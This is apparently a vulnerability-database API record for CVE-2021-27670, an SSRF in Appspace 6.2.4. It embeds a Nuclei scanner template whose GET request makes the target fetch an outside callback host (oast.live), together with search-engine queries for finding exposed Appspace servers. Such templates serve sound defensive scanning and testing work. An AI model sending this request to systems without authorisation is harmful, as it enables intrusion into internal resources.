{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-27670/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-27670/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-27670/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-27670/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-27670/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-27670"},"sightings":{"href":"/api/v1/sightings/cve-2021-27670"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-27670.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-27670\n\ninfo:\n  name: Appspace 6.2.4 - Server-Side Request Forgery\n  author: ritikchaddha\n  severity: critical\n  description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n  remediation: |\n    Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.\n  reference:\n    - https://github.com/h3110mb/PoCSSrfApp\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-27670\n    - https://github.com/ArrestX/--POC\n    - https://github.com/KayCHENvip/vulnerability-poc\n    - https://github.com/Miraitowa70/POC-Notes\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-27670\n    cwe-id: CWE-918\n    epss-score: 0.61274\n    epss-percentile: 0.99123\n    cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: appspace\n    product: appspace\n    shodan-query:\n      - title:\"Appspace\"\n      - http.title:\"appspace\"\n    fofa-query: title=\"appspace\"\n    google-query: intitle:\"appspace\"\n  tags: cve,cve2021,appspace,ssrf,vuln,vkev\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<h1> Interactsh Server </h1>\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100cc7cf6f51b19c5f1ad394f8b85548be931eae5941d5ada1bd44e84e20347bb95022062d1cd4ba27cbbeb16f1cb7427400f1808823bda9cdb08f8e293c5d995df06ae:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2021-27670"}